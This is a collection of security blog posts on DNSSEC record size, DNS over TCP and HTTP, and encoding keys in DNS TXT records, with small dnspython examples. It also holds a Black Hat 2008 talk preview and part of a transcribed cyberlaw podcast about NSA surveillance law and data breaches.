TnNICdNMaHx68Z5TK8i9QV6nkmEIIYQ32HlwVX4eSmEdxLX0LTFTaiyLO6kHEzJg
CxW8RKsTBFRVDkZQ4CtxpvSV3OSJEEoHiJ++RiLZYY/1XRafwxqESMn+bGNM7aoE
NHJz3Uzu2/rSFQ5v7pmTpJokNcHl8hY1fCFs01PYkoWm0WXKYnDHL4+L46orvsyE
GM1PAYpIdTSp
-----END CERTIFICATE-----

Compared to the size of an IP address, this is a bit much.  There are three things that give me pause about pushing so much in.

First — and, yes, this is a personal bias — every time we try to put this much in DNS, we end up creating a new protocol in which we don’t.  There’s a dedicated RRTYPE for certificate storage, called CERT.  From what I can tell, the PGP community used CERT, and then migrated away.  There’s also the experience we can see in the X.509 realm, which had many places where certificate chains were declared inline.  For various reasons, these in-protocol declarations were farmed out to URLs from which resources could be retrieved as necessary.  Inlining became a scalability blocker.

Operational experience is important.

Second, there’s a desire to avoid DNS packets that are too big to fit into UDP frames.  UDP, the User Datagram Protocol, is basically a thin application-layer wrapper around IP itself.  There’s no reliability and few features around it — it’s little more than “here’s the app I want to talk to, and here’s a checksum for what I was trying to say” (and the latter is optional).  When using UDP, there are two size points to be concerned with.

The first is (roughly) 512 bytes.  This is the traditional maximum size of a DNS packet, because it’s the traditional minimum size of a packet an IP network can be guaranteed to transmit without fragmentation en route.

The second is (roughly) 1500 bytes.  This is essentially how much you’re able to move over IP (and thus UDP) itself before your packet gets fragmented — generally immediately, because it can’t even get past the local Ethernet card.

There’s a strong desire to avoid IP fragmentation, as it has a host of deleterious effects.  If any IP fragment is dropped, the entire packet is lost.  So there are “more swings at the bat” at having a fatal drop.  In the modern world of firewalls, fragmentation isn’t supported well, since you can’t know whether to pass a packet until the entire thing has been reassembled.  I don’t think any sites flat out block fragmented traffic, but it’s certainly not something that’s optimized for.

Finally — and more importantly than anyone admits — fragmented traffic is something of a headache to debug.  You have to have reassembly in your decoders, and that can be slow.

However, we’ve already sort of crossed the Rubicon here.  DNSSEC is many things, but small is not one of them.  The increased size of DNSSEC responses is not by any stretch of the imagination fatal, but it does end the era of tiny traffic.  This is made doubly true by the reality that, within the next five or so years, we really will need to migrate to key sizes greater than 1024 bits.  I’m not sure we can afford 2048, though NIST is fairly adamant about that.  But 1024 is definitely the new 512.

That’s not to say that DNSSEC traffic will always fragment at UDP.  It doesn’t.  But we’ve accepted that DNS packets will get bigger with DNSSEC, and fairly extensive testing has shown that the world does not come to an end.

It is a reasonable thing to point out, though, that while use of DNSSEC might lead to fragmentation, use of massive records in the multi-kilobyte range will, every time.

(There’s an amusing thing in DNSSEC which I’ll go so far as to say I’m not happy about.  There’s actually a bit, called DO, that says whether the client wants signatures.  Theoretically we could use this bit to only send DNSSEC responses to clients that actually want signatures.  But I think somebody got worried that architectures would be built to only serve DNSSEC to 0.01% of clients — gotta start somewhere.  So now, 80% of DNS requests claim that they’ll validate DNSSEC.  This is…annoying.)
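
To tie the size thresholds and the DO bit together, here’s a minimal sketch — dnspython assumed, with the resolver address and name as placeholder choices — comparing a classic, 512-byte-limited query against an EDNS0 query that advertises a 4096-byte buffer and sets DO:

import dns.flags, dns.message, dns.query, dns.rdatatype

SERVER = "8.8.8.8"        # any recursive resolver will do; placeholder choice
NAME = "www.example.com"  # placeholder name

# Classic DNS: no EDNS0, so anything over 512 bytes comes back truncated (TC).
plain = dns.query.udp(dns.message.make_query(NAME, dns.rdatatype.A),
                      SERVER, timeout=2)
print(len(plain.to_wire()), "bytes, truncated:", bool(plain.flags & dns.flags.TC))

# EDNS0 with DO set: advertise a 4096-byte UDP buffer and ask for signatures.
signed = dns.query.udp(
    dns.message.make_query(NAME, dns.rdatatype.A, use_edns=0,
                           payload=4096, want_dnssec=True),
    SERVER, timeout=2)
print(len(signed.to_wire()), "bytes once RRSIGs ride along (if the zone is signed)")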

Now, there’s of course a better way to handle large DNS records than IP fragmenting:  TCP.  But TCP has historically been quite slow, both in terms of round trip time (there’s a setup penalty) and in terms of kernel resources (you have to keep sockets open).  But a funny thing happened on the way to billions of hits a day.

TCP stopped being so bad.

The setup penalty, it turns out, can be amortized across multiple queries.  Did you know that you can run many queries off the same TCP DNS socket, pretty much exactly like HTTP pipelines?  It’s true!  And as for kernel resources…

TCP stacks are now fast.  In fact — and, I swear, nobody was more surprised than me — when I built support for what I called “HTTP Virtual Channel” into Phreebird and LDNS, so that all DNS queries would be tunneled over HTTP, the performance impact wasn’t at all what I thought it would be:

DNS over HTTP is actually faster than DNS over UDP — by a factor of about 25%.  Apparently, a decade of optimising web servers has had quite the effect.  Of course, this requires a modern approach to TCP serving, but that’s the sort of thing libevent makes pretty straightforward to access.  (UPDATE:   TCP is reasonably fast, but it’s not UDP fast.  See here for some fairly gory details.) And it’s not like DNSSEC isn’t necessitating pretty deep upgrades to our name server infrastructure anyway.
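
Here’s a rough sketch of that pipelining, assuming dnspython for message construction and a placeholder server address.  DNS over TCP frames each message with a two-byte length prefix, so several queries can be written down one socket before any responses are read; a production client would match responses to queries by ID rather than assuming they come back in order.

import socket, struct
import dns.message, dns.rdatatype

SERVER = ("203.0.113.1", 53)   # placeholder authoritative/recursive server
NAMES = ["www.cnn.com", "www.example.com", "www.wikipedia.org"]

sock = socket.create_connection(SERVER, timeout=5)

# Write all the queries first; each is prefixed with its two-byte length.
for name in NAMES:
    wire = dns.message.make_query(name, dns.rdatatype.A).to_wire()
    sock.sendall(struct.pack("!H", len(wire)) + wire)

def read_exact(s, n):
    buf = b""
    while len(buf) < n:
        chunk = s.recv(n - len(buf))
        if not chunk:
            raise EOFError("server closed the connection")
        buf += chunk
    return buf

# Then read the responses back over the same, already-open socket.
for _ in NAMES:
    (length,) = struct.unpack("!H", read_exact(sock, 2))
    response = dns.message.from_wire(read_exact(sock, length))
    print(response.question[0].name, "->", len(response.answer), "answer RRs")

sock.close()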

So it’s hard to argue we shouldn’t have large DNS records just because they’ll make the DNS packets bigger.  That ship has sailed.  There is of course the firewalling argument — you can’t depend on TCP, because clients may not support the transport.  I have to say, if your client doesn’t support TCP lookup, it’s just not going to be DNSSEC compliant.

Just part of compliance testing.  Every DNSSEC validator should in fact be making sure TCP is an available endpoint.

There’s a third argument, and I think it deserves to be aired.  Something like 99.9% of users are behind a DNS cache that groups their queries with other users.  On average, something like 90% of all queries never actually leave their host networks; instead they are serviced by data already in the cache.

Would it be fair for one domain to be monopolizing that cache?

This isn’t a theoretical argument.  More than a few major Top 25 sites have wildcard generated names, and use them.   So, when you look in the DNS cache, you indeed see huge amounts of throwaway domains.  Usually these domains have a low TTL (Time to Live), meaning they expire from cache quickly anyway.  But there are grumbles.

My sense is that if cache monopolization became a really nasty problem, then it would represent an attack against a name server.  In other words, if we want to say that it’s a bug for http://www.foo.com to populate the DNS cache to the exclusion of all others, then it’s an attack for http://www.badguy.com to be able to populate said cache to the same exclusion.  It hasn’t been a problem, or an attack I think, because it’s probably the least effective denial of service imaginable.

I could see future name servers tracking the popularity of cache entries before determining what to drop.  Hasn’t been needed yet, though.

Where this comes down to is — is it alright for DNS to require more resources?  Like I wrote earlier, we’ve already decided it’s OK for it to.  And frankly, no matter how much we shove into DNS, we’re never getting into the traffic levels that any other interesting service online is touching.  Video traffic is…bewilderingly high.

So do we end up with a case for shoving massive records into the DNS, and justifying it because a) DNSSEC does it and b) they’re not that big, relative to, say, Internet video?  I have to admit, if you’re willing to “damn the torpedoes” on IP fragmentation or upgrading to TCP, the case is there.  And ultimately, the joy of a delegated namespace is that — it’s your domain, you can put whatever you want in there.

My personal sense is that while IP fragmentation / TCP upgrading / cache consumption isn’t the end of the world, it’s certainly worth optimizing against.  More importantly, operational experience that says “this plan doesn’t scale” shows up all over the place — and if there’s one thing we need to do more of, it’s to identify, respect, and learn from what’s failed before and what we did to fix it.

A lot of protocols end up passing URLs to larger resources, to be retrieved via HTTP, rather than embedding those resources inline.  In my next post, we’ll talk about what it might look like to push HTTP URLs into DNS responses.  And that, I think, will segue nicely into why I was writing a DNS over HTTP layer in the first place.

Categories: Security

The DNSSEC Diaries, Ch. 2: For Better or Worse, How The TXT Was Won

December 14, 2010 10 comments

So, I think it’s fairly elegant and straightforward to put a key into DNS like so:

www.hospital-link.org IN TXT “v=key1 ha=sha1 h=f1d2d2f924e986ac86fdf7b36c94bcdf32beec15”

On connecting to http://www.hospital-link.org over TLS, a certificate will be delivered.  Traditionally, this certificate would be interrogated to make sure it was signed by a trusted certificate authority.  In the new model:

  • If DNSSEC says the above TXT record chains to the (one) DNS root, and
  • The subtype of the TXT record is key1, and
  • The SHA-1 hash of the delivered certificate is precisely f1d2d2f924e986ac86fdf7b36c94bcdf32beec15, and
  • TLS is happy with the public key in the certificate

…then the connection is considered authenticated, whether or not a CA ultimately signed the certificate.  That’s it.  Move on with life.  Cheap.
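
For concreteness, here’s a minimal sketch of that check in Python (dnspython 2.x assumed; in 1.x the call is dns.resolver.query rather than resolve).  It deliberately skips the hard part — actually validating, via DNSSEC, that the TXT record chains to the root — along with all error handling; it only shows how cheap the comparison itself is.

import hashlib
import ssl
import dns.resolver

def pinned_sha1(name):
    # Pull the "v=key1 ha=sha1 h=..." TXT record and return the hash field.
    for record in dns.resolver.resolve(name, "TXT"):
        txt = b"".join(record.strings).decode("ascii")
        fields = dict(part.split("=", 1) for part in txt.split() if "=" in part)
        if fields.get("v") == "key1" and fields.get("ha") == "sha1":
            return fields.get("h")
    return None

def certificate_matches(name, port=443):
    # Fetch the server's certificate, hash its DER encoding, and compare.
    pem = ssl.get_server_certificate((name, port))
    der = ssl.PEM_cert_to_DER_cert(pem)
    return hashlib.sha1(der).hexdigest() == pinned_sha1(name)

print(certificate_matches("www.hospital-link.org"))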

Can it really be this easy?  I’ll be honest, some people aren’t the biggest fans of this design.  Implementers like it.  Ops guys like it.  I like it.

Some old-school DNS people do not like it.  They don’t want to see everything shoved under a single record type (TXT or otherwise), and they don’t like the idea of a seemingly unstructured textual field containing anything important.  Heck, they even wrote an Informational RFC on the subject (RFC 5507).  The core arguments in this doc:

  • No semantics to prevent collision with other use
  • Space considerations in the DNS message

It’s really not a great RFC, but these aren’t meaningless concerns.  However, the heart of engineering is understanding not just why systems succeed, but why they fail.  Let’s talk about why, despite the above, I’m convinced public keys in DNS should be encoded as TXT records.

The primary reason is that the story of TXT is the story of real world systems trying non-TXT, and, well, running away screaming. In the last ten years, four major projects have all gone TXT:

  1. SPF (Sender Policy Framework)
  2. DKIM (DomainKeys)
  3. GPG’s PKA (PGP Key Retrieval)
  4. FreeSWAN’s IPSec (X-IPSec-Server)

They have company.  From a sample of DNS traces, here’s the count of unique types per unique name (fraction of the total, count, record type):

0.40	143453512	A
0.31	110097927	NS
0.13	48033288	CNAME
0.07	23989120	MX
0.04	12841932	RRSIG
0.02	8314220	PTR
0.02	7665020	TXT
0.01	2575267	NSEC
0.00	1557321	NSEC3
0.00	563675	SRV
0.00	276820	AAAA
0.00	53855	NULL
0.00	44411	SPF
0.00	24308	DS
0.00	3190	DNSKEY
0.00	1498	RP
0.00	1216	HINFO
0.00	1118	DLV
0.00	687	DNAME
0.00	557	LOC
0.00	545	514
0.00	491	NAPTR

Excluding DNSSEC, which is its own universe, and AAAA, which is a trivial blob of bits (a 128 bit IPv6 address), TXT is about three orders of magnitude more popular than all RR types invented in the last ten years combined.  Data encoded in TXT is almost as popular as Reverse DNS!

And it’s not like projects didn’t have the opportunity to use custom RRTYPEs.

Consider:  For half of these packages (GPG and FreeS/WAN), RFCs existed to store their data already, but (and this is important) either the developers found the RFCs too difficult to implement, or users found the code too tricky to deploy.  In FreeS/WAN’s case, this was so true that:

As of FreeS/WAN 2.01, OE uses DNS TXT resource records (RRs) only (rather than TXT with KEY). This change causes a “flag day”.

Wow.  That is fairly tremendous.  Flag days — the complete shift of a system from a broken design to a hopefully better one — are rare to the point of being almost unheard of in networking design.  They are enormously painful, and only executed when the developer believes their product is absolutely doomed to failure otherwise.

There’s a lot of talk about how custom RRs aren’t that bad.  Talk is cheap.  Evidence that a design choice forced a flag day is rare, precious, and foreboding.

The reality — the real precedent, far larger than the world of DNS or even security — is that for operational and developmental reasons, developers have abandoned binary formats. XML, and even its lighter cousin JSON, are not the smallest possible way to encode a message the world has ever known.  It is possible to save more space.

Sorry, X.509.  We’ve abandoned ASN.1, even if bit for bit it’s more space efficient.  We abandoned it for a reason.  The programming community is simply done with the sort of bit-fiddly constructs that were popular in the 90’s, and that most DNS RR’s are constructed from, even if they are easy to parse in C.

Binary parsers (outside of media formats) are dead.  Frankly, as the number one source of exploitable crashes in most software, I’m not going to miss them.  Heck, we’re not even using TCP ports anymore — we have port 80, and we subtype the heck out of it at the URL layer (much as TXT is subtyped with v=key1).

It doesn’t help that, most of the time, DNS knows what fields it’s going to have to store, and identifies them positionally.  Contrast this with the coming reality of storing keys in DNS, where over time, we’re absolutely going to be adding more flags and bits.  That binary format will not be pretty.

Now, I have no interest in putting XML or even JSON into DNS (though the latter wouldn’t be the worst thing ever).  But what we’ve seen is reasonable consensus regarding what should go into TXT records:

  • SPF:  “v=spf1 a -all”
  • DKIM: “v=DKIM1;p=MIGfMA0G … cQ2QIDAQAB”
  • GPG: “v=pka1;fpr=[#1];uri=[#2]”
  • FreeS/WAN: “X-IPsec-Server(10)=192.1.1.5 AQMM…3s1Q==”

Identical?  No.  But straight key value pairs, and only one protocol that doesn’t begin with a magic cookie?  That’s doable.  That’s easy.

That’s cheap to deploy.  And cheap to deploy matters.

Now, here’s an interesting question:

“Why not use a custom RRTYPE, but fill it with key value pairs, or even JSON?  Why overload TXT?”

It’s a reasonable question.  The biggest source of content expansion comes from the fact that irrelevant records now need to be sent if there are multiple applications sitting on TXT.  Why not have multiple TXTs?

Perhaps, in the future, we could move in this direction.  Nowhere does it say that the same record can’t show up with multiple types.  (SPF tried this, without much success though.)  But, today, a big part of what makes non-TXT expensive to deploy is that name servers traditionally needed to be rebuilt to support a new record type.  After all, the server wasn’t just hosting records, it was compiling them into a binary format.

(Those who are IT administrators, but not DNS administrators, are all facepalming).

Eventually, RFC 3597 was built to get around this, allowing zone files to contain blobs like this:

sshfp  TYPE44  \# 22 01 01 c691e90714a1629d167de8e5ee0021f12a7eaa1e

To be gentle, zone files filled with hex and length fields, requiring record compilers to update, aren’t exactly operations’ idea of a good, debuggable time.  This is expensive.

Of course, a lot of people aren’t directly editing zone files anymore.  They’re operating through web interfaces.  Through these interfaces, either you’re putting in a resource type the server knows of, you’re putting text into a TXT record, or…you’re putting in nothing.

It’s possible to demand that web interfaces around the Internet be updated to support your new record type.  But there is no more expensive ask than that which demands a UI shift.  A hundred backends can be altered for each frontend that needs to be poked at.  The backends support TXT.  They don’t support anything else, and that fact isn’t going to change anytime soon.

And then there are the firewalls — the same firewalls which, like it or not, have made HTTP on 80/tcp the Universal Tunneling Protocol.  Quoting the above RFC 5507 (which observes the following, and then just seems to shrug):

…Firewalls have dropped queries or responses with Resource Record Types that are unknown to the firewall.  This is, for example, one of the reasons the ENUM standard reuses the NAPTR Resource Record, a decision that today might have gone to creating a new Resource Record Type instead.

There’s a reason all those packages abandoned non-TXT.  Whatever downsides there are to using TXT, and I do admit there are some, those who have chosen an architecturally pure custom RRTYPE have failed, while those who’ve “temporarily” gone TXT have prospered.

Next up, let’s talk about the challenges of putting bootstrap content into the DNS itself.

"v=pka1;fpr=[#1];uri=[#2]"
Categories: Security

Black Hat 2008

August 2, 2008 11 comments

Five more days until three more conferences.

Three?

Yep — SIGGRAPH finally deigned to not conflict with Black Hat this year, which means I get to stage a return trip to LA and see pretty pictures.  I probably won’t end up with a conference pass, but Emerging Technologies is worth the entire trip.  So much awesome stuff to play with!

So, everyone’s making lists of stuff they want to see.  Here’s some stuff I haven’t heard people talking about:

Concurrency Attacks in Web Applications — Scott Stender
Anyone ever notice how none of the scripting languages have decent threading support — not Perl, not Python, not PHP, not anything?  No?  It’s because maintaining concurrent access to shared resources is really, really hard — one of the hardest problems in computer science.  Theoretically, the problem shouldn’t affect the web, because HTTP is “stateless”.

Well, what’s the first thing every Web Application Framework adds?  State.  And is concurrent access required to this state?

Not usually…users just have a single browser window open…so, it works!  Ship it!

Long term, I suspect Scott’s talk here has significant potential to change web application auditing.

Circumventing Automated JavaScript Analysis Tools — Billy Hoffman
Mobile code happened, and its name is Javascript.  I was recently told of a 75K medical management application, written in JS.  I refused to believe it until I realized that it probably was faster, and more stable, and written at less cost even, than the same code would have been in any other language.

C++ objects, scripted with a language that won’t usually crash — the only way to write a GUI.

It’s even a lot more secure than it gets credit for.  Really, which would you rather parse:

1. x86
2. Java Bytecode
3. MSIL
4. JavaScript

Sure, you can import all sorts of crazy things into the sandbox, but the sandbox itself is pretty good.

Just don’t try to build another sandbox, a second sandbox, out of the sand inside.  People want to do this — they want to let this Javascript run, but not that Javascript run, based on prior analysis.  This, of course, will not work.  We know it will not work.  Turing completeness and the Halting Problem pretty much declare you hosed.  But people try anyway, and now, oh look, it’s Billy Hoffman, standing by a fire truck, turning a valve…

Visual Forensic Analysis and Reverse Engineering of Binary Data — Greg Conti, Erik Dean.

The problem with visualization is simple:  99% of it is crap.  1% of it is so amazingly good, it makes the other 99% worth digging through.  Greg’s been working on security visualization for years, and I’m interested in seeing what he’s up to here.

New Classes of Security and Privacy Vulnerabilities for Implantable Wireless Medical Devices — Tadayoshi Kohno, Kevin Fu
Remember when every juice was being mixed with Cranberry — CranApple, CranGrape, etc — because, oh man, people just can’t get enough of that Cran tang?  RFID is the Cran of Technology.

Methods for Understanding Targeted Attacks with Office Documents — Bruce Dang

Bruce Dang is a badass.  You people don’t even know.

Encoded, Layered, and Transcoded Syntax Attacks: Threading the Needle past Web Application Security Controls — Arian Evans
If you have no idea how redonkulous securely filtering content really needs to be, you need to see this talk.

Passive and Active Leakage of Secret Data from Non Networked Computer — Eric Filiol
Tempest v. Web 2.0 — two technologies enter, one technology leaves — with the data.

Get Rich or Die Trying – “Making Money on The Web, The Black Hat Way” — Jeremiah Grossman, Arian Evans
It’s 2008, and seriously, it’s all about monetization.  Good to see a talk that recognizes that. 

Reverse DNS Tunneling Shellcode — Ty Miller
So, anyone monitoring for DNS exfiltration yet?  Anyone?

REST for the Wicked — Bryan Sullivan
Seriously?  Is it possible to do REST securely?

Leveraging the Edge: Abusing SSL VPNs — Mike Zusman
You’ll see.

That’s enough for now.  I’ll post in a bit on a few more things — there’s some really interesting Defcon-only talks this year, including a brings-tears-to-your-eyes-it-so-old-school stunt by Jonathan Brossard.  And who knows, maybe I’ll even point out the talks I’d go see at SIGGRAPH if I could.

Well, it’s either that or do more work on DNS 🙂

Categories: Security

Talking with Stewart Baker

June 11, 2015 1 comment

So I went ahead and did a podcast with Stewart Baker, former general counsel for the NSA and actually somebody I have a decent amount of respect for (Google set me up with him during the SOPA debate; he understood everything I had to say, and he really applied some critical pressure publicly and behind the scenes to shut that mess down).  Doesn’t mean I agree with the guy on everything.  I told him in no uncertain terms we had some disagreements regarding backdoors, and that if he asked me about them I’d say as much.  He was completely OK with this, and in today’s echo-chamber-loving society that’s a real outlier.  The debate is a ways in, and starts around here.

You can get the audio (and a summary) here but as usual I’ve had the event transcribed.  Enjoy!

Steptoe Cyberlaw Podcast-070

Stewart: Welcome to episode 70 of the Steptoe Cyberlaw Podcast brought to you by Steptoe & Johnson; thank you for joining us. We’re lawyers talking about technology, security, privacy in government and I’m joined today by our guest commentator, Dan Kaminsky, who is the Chief Scientist at WhiteOps, the man who found and fixed a major and very troubling flaw in the DNS system and my unlikely ally in the fight against SOPA because of its impact on DNS security. Welcome, Dan.

Dan: It’s good to be here.

Stewart: All right; and Michael Vatis, formerly with the FBI and the Justice Department, now a partner in Steptoe’s New York office. Michael, I’m glad to have you back, and I guess to be back with you on the podcast.

Michael: It’s good to have a voice that isn’t as hoarse as mine was last week.

Stewart: Yeah, that’s right, but you know, you can usually count on Michael to know the law – this is a valuable thing in a legal podcast – and Jason Weinstein who took over last week in a coup in the Cyberlaw podcast and ran it and interviewed our guest, Jason Brown from the Secret Service. Jason is formerly with the Justice Department where he oversaw criminal computer crime, prosecutions, among other things, and is now doing criminal and civil litigation at Steptoe.

I’m Stewart Baker, formerly with NSA and DHS, the record holder for returning to Steptoe to practice law more times than any other lawyer, so let’s get started. For old time’s sake we ought to do one more, one last hopefully, this week in NSA. The USA Freedom Bill was passed, was debated, not amended after efforts; passed, signed and is in effect, and the government is busy cleaning up the mess from the 48/72 hours of expiration of the original 215 and other sunsetted provisions.

So USA Freedom; now that it’s taken effect I guess it’s worth asking what does it do. It gets rid of bulk collection across the board really. It says, “No, you will not go get stuff just because you need it, and won’t be able to get it later if you can’t get it from the guy who holds it, you’re not going to get it.” It does that for a pen trap, it does that for Section 215, the subpoena program, and it most famously gets rid of the bulk collection program that NSA was running and that Snowden leaked in his first and apparently only successful effort to influence US policy.

[Helping] who are supposed to be basically Al Qaeda’s lawyers – that’s editorializing; just a bit – they’re supposed to stand for freedom and against actually gathering intelligence on Al Qaeda, so it’s pretty close. And we’ve never given the Mafia its own lawyers in wiretap cases before the wiretap is carried out, but we’re going to do that for –

Dan: To be fair you were [just] wiretapping the Mafia at the time.

Stewart: Oh, absolutely. Well, the NSA never really had much interest in the Mafia but with Title 3 yeah; you went in and you said, “I want a Title 3 order” and you got it if you met the standard, in the view of judge, and there were no additional lawyers appointed to argue against giving you access to the Mafia’s communications. And Michael, you looked at it as well – I’d say those were the two big changes – there are some transparency issues and other things – anything that strikes you as significant out of this?

Michael: I think the only other thing I would mention is the restrictions on NSLs where you now need to have specific selection terms for NSLs as well, not just for 215 orders.

Stewart: Yeah, really the house just went through and said, ”Tell us what capabilities could be used to gather international security agencies’ information and we will impose this specific selection term, requirement, on it.” That is really the main change probably for ordinary uses of 215 as though it were a criminal subpoena. Not that much change. I think the notion of relevance has probably always carried some notion that there is a point at which it gathered too much and the courts would have said, “That’s too much.”

Michael: going in that, okay, Telecoms already retain all this stuff for 18 months for billing purpose, and they’re required to by FCC regulation, but I think as we’ve discussed before, they’re not really required to retain all the stuff that NSA has been getting under bulk retention program, especially now that people have unlimited calling plans, Telecoms don’t need to retain information about every number call because it doesn’t matter for billing purposes.

So I think, going forward, we’ll probably hear from NSA that they’re not getting all the information they need, so I don’t think this issue is going to go away forever now. I think we’ll be hearing complaints and having some desire by the Administration to impose some sort of data retention requirements on Telecoms, and then they’ll be a real fight.

Stewart: That will be a fight. Yeah, I have said recently that, sure, this new approach can be as effective as the old approach if you think that going to the library is an adequate substitute for using Google. They won’t be able to do a lot of the searching that they could do and they won’t have as much data. But on the upside there are widespread rumors that the database never included many smaller carriers, never included mobile data probably because of difficulties separating out location data from the things that they wanted to look at.

So privacy concerns have already sort of half crippled the program and it also seems to me you have to be a remarkably stupid terrorist to think that it’s a good idea to call home using a phone that operates in the United States. People will use Call of Duty or something to communicate.

All right, the New York Times has one of its dumber efforts to create a scandal where there is none – it was written by Charlie Savage and criticized on “Lawfare” by Ben Wittes, and Charlie, who probably values his reputation in National Security circles somewhat, writes a really slashing response to Ben Wittes, but I think, frankly, Ben has the better of the argument.

The story says “Without public notice or debate the Obama Administration has expanded the NSA’s warrantless surveillance of Americans’ international internet traffic to search for evidence of malicious computer hacking” according to some documents obtained from Snowden. It turns out, if I understand this right, that what NSA was looking for in that surveillance, which is a 702 surveillance, was malware signatures and other indicia that somebody was hacking Americans, so they collected or proposed to collect the incoming communications from the hackers, and then to see what was exfiltrated by the hackers.

In what universe would you describe that as Americans’ international internet traffic? I don’t think that when somebody’s hacking me or stealing my stuff, that’s my traffic. That’s his traffic, and to lead off with that framing of the issue it’s clearly baiting somebody for an attempted scandal, but a complete misrepresentation of what was being done.

Dan: I think one of the issues is there’s a real feeling, “What are you going to do with that data?” Are you going to report it? Are you going to stop malware? Are you going to hunt someone down?

Stewart: All of it.

Dan: Where is the – really?

Stewart: Yeah.

Dan: Because there’s a lot of doubt.

Stewart: Yeah; I actually think that the FBI regularly – this was a program really to support the FBI in its mission – and the FBI has a program that’s remarkably successful in the sense that people are quite surprised when they show up, to go to folks who have been compromised to say, “By the way, you’re pwned,” and most of the time when they do that some people say, “What? Huh?” This is where some of that information almost certainly comes from.

Dan: The reality is, everyone always says, “I can’t believe Sony got hacked,” and many of us actually in the field go, “Of course we can believe it.” Sony got hacked because everybody’s hacked somewhere.

Stewart: Yes, absolutely.

Dan: There’s a real need to do something about this on a larger scale. There is just such a lack of trust going on out there.

Stewart: Oh yeah.

Dan: And it’s not without reason.

Stewart: Yeah; Jason, any thoughts about the FBIs role in this?

Jason: Yeah. I think that, as you said, the FBI does a very effective job at knocking on doors or either pushing out information generally through alerts about new malware signatures or knocking on doors to tell particular victims they’ve been hacked. They don’t have to tell them how they know or what the source of the information is, but the information is still valuable.

I thought to the extent that this is one of those things under 702, where I think a reasonable person will look at this and be appreciative of the fact that the government was doing this, not critical. And as you said, the notion that this is sort of stolen internet traffic from Americans is characterized as surveillance of American’s traffic, is a little bit nonsensical.

Stewart: So without beating up Charlie Savage – I like him, he deserves it on this one – but he’s actually usually reasonably careful. The MasterCard settlement or the failed MasterCard settlement in the Target case, Jason, can you bring us up to date on that and tell us what lessons we should learn from it?

Jason: There have been so many high profile breaches in the last 18 months people may not remember Target, which of course was breached in the holiday season of 2013. MasterCard, as credit card companies often do, try to negotiate a settlement on behalf of all of their issuing banks with Target to pay damages for losses suffered as a result of the breach. In April MasterCard negotiated a proposed settlement with Target that would require Target to pay about $19 million to the various financial institutions that had to replace cards and cover for all losses and things of that nature.

But three of the largest banks, in fact I think the three largest MasterCard issuing banks, Citi Group, Capital One and JP Morgan Chase, all said no, and indicated they would not support the settlement and scuttled it because they thought $19 million was too small to cover the losses. There are trade groups for the banks and credit unions that say that between the Target and Home Depot breaches combined there were about $350 million in costs incurred by the financial institutions to reissue cards and cover losses, and so even if you factor out the Home Depot portion of that $19 million, it’s a pretty small number.

So Target has to go back to the drawing board, as does MasterCard to figure out if there’s a settlement or if the litigation is going to continue. And there’s also a proposed class action ongoing in Minnesota involving some smaller banks and credit unions as well. It would only cost them $10 million to settle the consumer class action, but the bigger exposure is here with the financial institution – Michael made reference last week to some press in which some commentator suggested the class actions from data breaches were on the wane – and we both are of the view that that’s just wrong.

There may be some decrease in privacy-related class actions related to misuse of private information by providers, but when it comes to data breaches involving retailers and credit card information, I think not only are the consumer class actions not going anywhere, but the class actions involving the financial institutions are definitely not going anywhere. Standing is not an issue at all. It’s pretty easy for these plaintiffs to demonstrate that they suffered some kind of injury; they’re the ones covering the losses and reissuing the cards, and depending on the size of the breach the damages can be quite extensive. I think it’s a sign of the times that in these big breaches you’ll find banks that are insisting on a much bigger pound of flesh from the victims.

Stewart: Yeah, I think you’re right about that. The settlements, as I saw when I did a quick study of settlements for consumers, are running between 50 cents and two bucks per exposure, which is not a lot, and the banks’ expenses for reissuing cards are more like 50 bucks per victim. But it’s also true that many of these cards are never going to be used; many of these numbers are never going to be used, and so spending 50 bucks for every one of them to reissue the cards, at considerable cost to the consumers as well, might be an overreaction, and I wouldn’t be surprised if that were an argument.

Dan: So my way of looking at this is from the perspective of deterrence. Is $19 million enough of a cost to Target to cause them to change their behavior and really divest – it’s going to extraordinarily expense to migrate our payment system to the reality, which is we have online verification. We can use better technologies. They exist. There’s a dozen ways of doing it that don’t lead to a password to your money all over the world. This is ridiculous.

Stewart: It is.

Dan: I’m just going to say the big banks have a point; $19 million is –

Stewart: Doesn’t seem like a lot.

Dan: to say, “We really need to invest in this; this never needs to happen again,” and I’m not saying 350 is the right number but I’ve got to agree, 19 is not.

Stewart: All right then. Okay, speaking of everybody being hacked, everybody includes the Office of Personnel Management.

Dan: Yeah.

Stewart: My first background investigation and it was quite amusing because the government, in order to protect privacy, blacked out the names of all the investigators who I wouldn’t have known from Adam, but left in all my friends’ names as they’re talking about my drug use, or not.

Dan: Alleged.

Stewart: Exactly; no, they were all stand up guys for me, but there is a lot of stuff in there that could be used for improper purposes and it’s perfectly clear that if the Chinese stole this, stole the Anthem records, the health records, they are living the civil libertarian’s nightmare about what NSA is doing. They’re actually building a database about every American in the country.

Dan: Yeah, a little awkward, isn’t it?

Stewart: Well, annoying at least; yes. Jason, I don’t know if you’ve got any thoughts about how OPM responds to this? They apparently didn’t exactly cover themselves with glory in responding to an IG report from last year saying, “Your system sucks so bad you ought to turn them off.”

Jason: Well, first of all as your lawyer I should say that your alleged drug use was outside the limitations period of any federal or state government that I’m aware of, so no one should come after you. I thought it was interesting that they were offering credit monitoring, given that the hack has been attributed to China, which I don’t think is having any money issues and is going to steal my credit card information.

I’m pretty sure that the victims include the three of us so I’m looking forward to getting that free 18 months of credit monitoring. I guess they’ve held out the possibility that the theft was for profit as opposed to for espionage purposes, and the possibility that the Chinese actors are not state sponsored actors, but that seems kind of nonsensical to me. And I think that, as you said, as you both said, that the Chinese are building the very database on us that Americans fear that the United States was building.

Stewart: Yeah, and I agree with you that credit monitoring is a sort of lame and bureaucratic response to this. Instead, they really ought to have the FBI and the counterintelligence experts ask, “What would I do with this data if I were the Chinese?” and then ask the people whose data has been exploited to look for that kind of behavior. Knowing how the Chinese do their recruiting, I’m guessing they’re looking for people who have family still in China – grandmothers, mothers and the like – and who also work for the US government, and they will recruit them on the basis of ethnic and patriotic duty. So folks in that situation could have their relatives visited for a little chat; there’s a lot of activity that is unique to Chinese use of this data that we ought to be watching for a little more aggressively than plain credit card theft.

Stewart: Yeah; well, that’s all we’ve got when it’s hackers. We should think of a new response to this.

Dan: We should, but like all hacks [attribution] is a pain in the butt because here’s the secret – hacking is not hard; teenagers can do it.

Stewart: Yes, that’s true.

Dan: [Something like this can take just] a few months.

Stewart: But why would they invest?

Dan: Why not? Data has value; they’ll sell it.

